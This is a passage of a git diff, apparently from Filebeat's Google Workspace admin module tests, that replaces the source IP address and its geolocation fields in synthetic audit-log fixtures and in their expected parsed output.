+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -196,26 +184,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1723,
+        "log.offset": 1720,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -240,7 +224,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -252,26 +236,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2233,
+        "log.offset": 2229,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log
index bed874fc9a42..7caea410de55 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log
@@ -1,74 +1,74 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
